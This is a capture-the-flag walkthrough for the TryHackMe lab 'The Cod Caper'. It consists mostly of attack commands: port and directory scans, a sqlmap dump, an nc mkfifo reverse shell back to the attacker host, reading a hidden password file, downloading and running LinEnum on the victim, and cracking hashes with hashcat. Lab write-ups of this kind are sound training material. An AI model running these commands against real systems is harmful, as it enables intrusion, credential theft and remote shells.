The Cod Caper

Room Link: https://tryhackme.com/room/thecodcaper

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

SQL

Kali

sqlmap -u http://$VICTIM/administrator.php --forms --dump

Method 1: nc Reverse shell:

Kali

nc -lvnp 1337

Browser

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $KALI 1337 >/tmp/f

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Method 2: Hidden passwords:

Browser

find / -user www-data 2>/dev/null
cat /var/hidden/pass

Kali

ssh pingu@$VICTIM
Password: pinguapingu

Enumeration

Download LinEnum Script

Kali

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

Kali

hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt --show